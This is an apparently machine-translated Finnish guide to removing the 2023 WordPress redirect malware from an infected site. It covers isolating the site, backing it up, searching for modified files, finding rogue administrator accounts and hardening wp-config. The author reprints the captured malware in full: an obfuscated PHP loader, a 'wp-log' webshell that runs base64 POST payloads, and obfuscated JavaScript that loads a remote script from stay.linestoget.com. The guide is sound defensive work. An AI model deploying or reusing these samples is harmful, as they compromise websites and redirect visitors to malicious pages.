WordPress on ehdottomasti eniten käytetty alusta CMS (Content Management System) sekä blogeille että aloitusverkkokaupoille (WooCommerce-moduulilla), mikä tekee siitä eniten tietokonehyökkäysten (hakkeroinnin) kohteena. Yksi käytetyimmistä hakkerointioperaatioista pyrkii ohjaamaan vaarantunut verkkosivusto muille verkkosivuille. Redirect WordPress Hack 2023 on suhteellisen uusi haittaohjelma, joka ohjaa koko sivuston roskapostisivuille tai voi vuorostaan saastuttaa käyttäjien tietokoneita.
sisältö
Jos WordPressillä kehitetty verkkosivustosi ohjataan toiselle sivustolle, se on todennäköisesti jo kuuluisan uudelleenohjaushakkeroinnin uhri.
Tästä opetusohjelmasta löydät tarvittavat tiedot ja hyödyllisiä vinkkejä, joiden avulla voit poistaa viruksen uudelleenohjauksella saastuneelta verkkosivustolta WordPress Hack (Virus Redirect). Kommenttien kautta voit saada lisätietoa tai pyytää apua.
Virustunnistus, joka uudelleenohjaa WordPress-sivustot
Äkillinen ja perusteeton nettiliikenteen väheneminen, tilausten määrän (verkkokaupoissa) tai mainostulojen lasku ovat ensimmäisiä merkkejä siitä, että jotain on vialla. Havaitseminen “Redirect WordPress Hack 2023” (Virus Redirect) voidaan myös tehdä “visuaalinen” kun avaat verkkosivuston ja sinut ohjataan toiselle verkkosivulle.
Kokemuksen mukaan useimmat verkkohaittaohjelmat ovat yhteensopivia Internet-selaimien kanssa: Chrome, Firefox, Edge, Opera. Jos olet Mac-käyttäjä, nämä virukset eivät näy juurikaan Safari-selaimessa. Safarin turvajärjestelmä estää äänettömästi nämä haitalliset komentosarjat.
Mitä tehdä, jos verkkosivustosi on saanut Redirect WordPress Hack -tartunnan
Toivon, että ensimmäinen askel ei ole paniikki tai verkkosivuston poistaminen. Edes tartunnan saaneita tai virustiedostoja ei pidä poistaa aluksi. Ne sisältävät arvokasta tietoa, joka voi auttaa sinua ymmärtämään, missä tietoturvaloukkaus on ja mikä virukseen vaikutti. Toimintatapa.
Sulje verkkosivusto yleisöltä.
Kuinka suljet virussivuston vierailijoilta? Helpoin on käyttää DNS-hallintaa ja poistaa sen IP-osoite “A” (domain name) tai määritä sille olematon IP. Siten verkkosivustojen vierailijat suojataan tältä WordPress-hakkeroinnin uudelleenohjauksesta, joka voi johtaa heidät virus- tai roskapostisivuille.
Jos käytät CloudFlare DNS-päällikkönä kirjaudut sisään tilillesi ja poistat DNS-tietueita “A” verkkotunnuksen nimeä varten. Siten viruksen saastuttama verkkotunnus jää ilman IP-osoitetta, eikä siihen voi enää päästä Internetistä.
Kopioi verkkosivuston IP ja tee “reittiä” jotta vain sinä pääset siihen. tietokoneeltasi.
Kuinka muutat verkkosivuston todellista IP-osoitetta Windows-tietokoneissa?
Menetelmää käytetään usein estämään pääsy tietyille verkkosivustoille muokkaamalla tiedostoa “isännät”.
1. Avaa Muistio tai muu tekstieditori (järjestelmänvalvojan oikeuksilla) ja muokkaa tiedostoa “hosts“. Se sijaitsee:
C:\Windows\System32\drivers\etc\hosts2. Tiedostossa “isännät” lisätä “reittiä” verkkosivustosi todelliseen IP-osoitteeseen. IP poistettu yllä DNS-hallinnasta.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Tallenna tiedosto ja siirry verkkosivustolle selaimessa.
Jos sivusto ei avaudu etkä ole tehnyt tiedostossa mitään väärää “isännät”, se on todennäköisesti DNS-välimuisti.
Tyhjennä DNS-välimuisti Windows-käyttöjärjestelmässä avaamalla komentokehote, jossa suoritat komennon:
ipconfig /flushdnsKuinka muutat verkkosivuston todellista IP-osoitetta Mac-/MacBook-tietokoneissa?
Mac-käyttäjille verkkosivuston todellisen IP-osoitteen vaihtaminen on hieman yksinkertaisempaa.
1. Avaa apuohjelma Terminal.
2. Suorita komentorivi (vaatii järjestelmän salasanan suorittamiseen):
sudo nano /etc/hosts3. Kuten Windows-tietokoneissa, lisää toimialueen todellinen IP-osoite.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Tallenna muutokset. Ctrl+X (y).
Sen jälkeen kun teit “reittiä”, olet ainoa henkilö, joka pääsee tartunnan saaneelle verkkosivustolle Redirect WordPress Hackilla.
Täydellinen varmuuskopiointisivusto – Tiedostot ja tietokanta
Vaikka se olisi saanut tartunnan “uudelleenohjaa WordPress-hakkerointi”, suositus on tehdä yleinen varmuuskopio koko verkkosivustosta. Tiedostot ja tietokanta. Mahdollisesti voit myös tallentaa paikallisen kopion molemmista tiedostoista public / public_html sekä tietokanta.
Viruksen käyttämien tiedostojen ja Redirect WordPress Hack 2023:n muokkaamien tiedostojen tunnistus
Sivuston tärkeimmät kohdetiedostot WordPress olen index.php (juuressa), header.php- index.php ja footer.php aktiivisesta WordPress-teemasta. Tarkista nämä tiedostot manuaalisesti ja tunnista haitallinen koodi tai haittaohjelmakomentosarja.
Vuonna 2023 eräänlainen virus “Uudelleenohjaa WordPress Hack” laittaa sisään index.php lomakkeen koodi:
(En suosittele näiden koodien käyttämistä!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Dekoodattu, tämä script haittaohjelma se on periaatteessa seurausta WordPress-verkkosivuston saastumisesta. Se ei ole haittaohjelman takana oleva komentosarja, vaan komentosarja, joka mahdollistaa tartunnan saaneen verkkosivun uudelleenohjauksen. Jos dekoodaamme yllä olevan skriptin, saamme:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Jotta voit tunnistaa kaikki tämän koodin sisältävät tiedostot palvelimella, sinulla on hyvä olla pääsy SSH palvelimelle tiedostojen tarkistuksen ja hallinnan komentorivien suorittamiseksi Linuxissa.
Liittyvät: Kuinka selvittää, onko blogisi saanut tartunnan Google-haun avulla. (WordPress-virus)
Alla on kaksi komentoa, jotka ovat varmasti hyödyllisiä tunnistamaan äskettäin muokatut tiedostot ja tiedostot, jotka sisältävät tietyn koodin (merkkijonon).
Miten näet PHP-tiedostot, joita on muutettu viimeisten 24 tunnin aikana tai muulla aikavälillä Linuxissa?
Komento “find” se on erittäin helppokäyttöinen ja mahdollistaa mukauttamisen aikajakson, haun polun ja tiedostotyypin asettamiseen.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Tulosteessa saat tietoa päivämäärästä ja kellonajasta, jolloin tiedostoa muokattiin, kirjoitus-/luku-/suoritusoikeuksista (chmod) ja mihin ryhmään/käyttäjään se kuuluu.
Jos haluat tarkistaa useampia päiviä sitten, muuta arvoa “-mtime -1” tai käyttää “-mmin -360” minuuttien ajan (6 tuntia).
Kuinka etsiä koodia (merkkijonoa) PHP-, Java-tiedostoista?
Komentorivi “löytää” jonka avulla voit löytää nopeasti kaikki PHP- tai Java-tiedostot, jotka sisältävät tietyn koodin, on seuraava:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Komento etsii ja näyttää tiedostot .php ja .js jotka sisältävät “uJjBRODYsU“.
Yllä olevien kahden komennon avulla saat helposti selville, mitä tiedostoja on muokattu äskettäin ja mitkä sisältävät haittaohjelmakoodia.
Poistaa haitallisen koodin muokatuista tiedostoista vaarantamatta oikeaa koodia. Minun skenaariossani haittaohjelma sijoitettiin ennen avaamista <head>.
Kun suoritat ensimmäistä komentoa “löytää” On täysin mahdollista, että löydät palvelimelta myös uusia tiedostoja, jotka eivät ole WordPressin ja joita et ole itse laittanut sinne. Tiedostot, jotka kuuluvat Redirect WordPress Hack -virukseen.
Tutkimassani skenaariossa shape-tiedostoja ilmestyi palvelimelle “wp-log-nOXdgD.php“. Nämä ovat tiedostoja “sukupolvi” jotka sisältävät myös uudelleenohjausviruksen käyttämää haittaohjelmakoodia.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Tyyppitiedostojen tarkoitus “wp-log-*” on levittää uudelleenohjaushakkerointivirusta muille palvelimella oleville verkkosivustoille. Se on tyyppinen haittaohjelmakoodi “webshell” koostuu a perusosio (jossa on määritelty joitain salattuja muuttujia) ja o suoritusosio jonka kautta hyökkääjä yrittää ladata ja suorittaa haitallisen koodin järjestelmään.
Jos on muuttuja POST nimetty ‘bh‘ ja sen salattu arvo MD5 on yhtä suuri kuin “8f1f964a4b4d8d1ac3f0386693d28d03“, komentosarja näyttää kirjoittavan salatun sisällön base64 toisesta nimetystä muuttujasta ‘b3‘ väliaikaiseen tiedostoon ja yrittää sitten sisällyttää tämän väliaikaistiedoston.
Jos on muuttuja POST tai GET nimetty ‘tick', komentosarja vastaa arvolla MD5 merkkijonosta “885“.
Tunnistaaksesi kaikki tämän koodin sisältävät tiedostot palvelimella, valitse yhteinen merkkijono ja suorita de-komento “find” (samanlainen kuin yllä). Poista kaikki tämän haittaohjelmakoodin sisältävät tiedostot.
Redirect WordPress Hackin käyttämä tietoturvahaavoittuvuus
Todennäköisesti tämä uudelleenohjausvirus saapuu kautta WordPress-järjestelmänvalvojan käyttäjän hyväksikäyttö tai tunnistamalla a haavoittuva laajennus joka mahdollistaa käyttäjien lisäämisen järjestelmänvalvojan oikeuksilla.
Useimmille WordPress-alustalle rakennetuille verkkosivustoille se on mahdollista teema- tai laajennustiedostojen muokkaaminenhallintaliittymästä (Dashboard). Näin ollen pahantahtoinen henkilö voi lisätä haittaohjelmakoodia teematiedostoihin luodakseen yllä näkyvät skriptit.
Esimerkki tällaisesta haittaohjelmakoodista on tämä:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript tunnistettu WordPress-teeman otsikossa heti tunnisteen avaamisen jälkeen <head>.
Tämän JavaScriptin tulkitseminen on melko vaikeaa, mutta on ilmeistä, että se kysyy toisesta verkko-osoitteesta, josta se todennäköisesti hakee muita komentosarjoja tiedostojen luomiseksi “wp-log-*” josta puhuimme edellä.
Etsi ja poista tämä koodi kaikista tiedostoista PHP vaikuttaa.
Sikäli kuin ymmärsin, tämä koodi oli manuaalisesti lisätty uusi käyttäjä, jolla on järjestelmänvalvojan oikeudet.
Joten estääksesi haittaohjelmakoodin lisäämisen hallintapaneelista, on parasta poistaa käytöstä mahdollisuus muokata WordPress-teemoja / laajennuksia hallintapaneelista.
Muokkaa tiedostoa wp-config.php ja lisää rivit:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Kun olet tehnyt tämän muutoksen, yksikään WordPress-käyttäjä ei voi muokata tiedostoja hallintapaneelista.
Tarkista käyttäjät, joilla on järjestelmänvalvojan rooli
Alla on SQL-kysely, jonka avulla voit etsiä järjestelmänvalvojakäyttäjiä WordPress-alustalla:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Tämä kysely palauttaa kaikki taulukon käyttäjät wp_users joka on määrittänyt järjestelmänvalvojan roolin. Kysely tehdään myös taulukolle wp_usermeta etsimään metaa ‘wp_capabilities', joka sisältää tietoja käyttäjärooleista.
Toinen tapa on tunnistaa ne seuraavista: Dashboard → Users → All Users → Administrator. On kuitenkin olemassa käytäntöjä, joilla käyttäjä voidaan piilottaa Dashboard-paneelissa. Paras tapa nähdä käyttäjät siis “Ylläpitäjä” WordPressistä on yllä oleva SQL-komento.
Minun tapauksessani tunnistin käyttäjän nimen perusteella tietokannasta “wp-import-user“. Aika vihjailevaa.
Täältä näet myös päivämäärän ja kellonajan, jolloin WordPress-käyttäjä luotiin. Käyttäjätunnus on myös erittäin tärkeä, koska se hakee palvelimen lokeista. Näin näet kaiken tämän käyttäjän toiminnan.
Poista käyttäjiä, joilla on järjestelmänvalvojan rooli jota et sitten tiedä vaihtaa salasanoja kaikille järjestelmänvalvojille. Toimittaja, kirjoittaja, ylläpitäjä.
Vaihda SQL-tietokannan käyttäjän salasana sivustolta, jota asia koskee.
Näiden vaiheiden suorittamisen jälkeen verkkosivusto voidaan käynnistää uudelleen kaikille käyttäjille.
Muista kuitenkin, että se, mitä esitin yllä, on yksi ehkä tuhansista skenaarioista, joissa verkkosivusto on saanut Redirect WordPress Hack -tartunnan vuonna 2023.
Jos sivustosi on saanut tartunnan ja tarvitset apua tai jos sinulla on kysyttävää, kommenttiosio on auki.
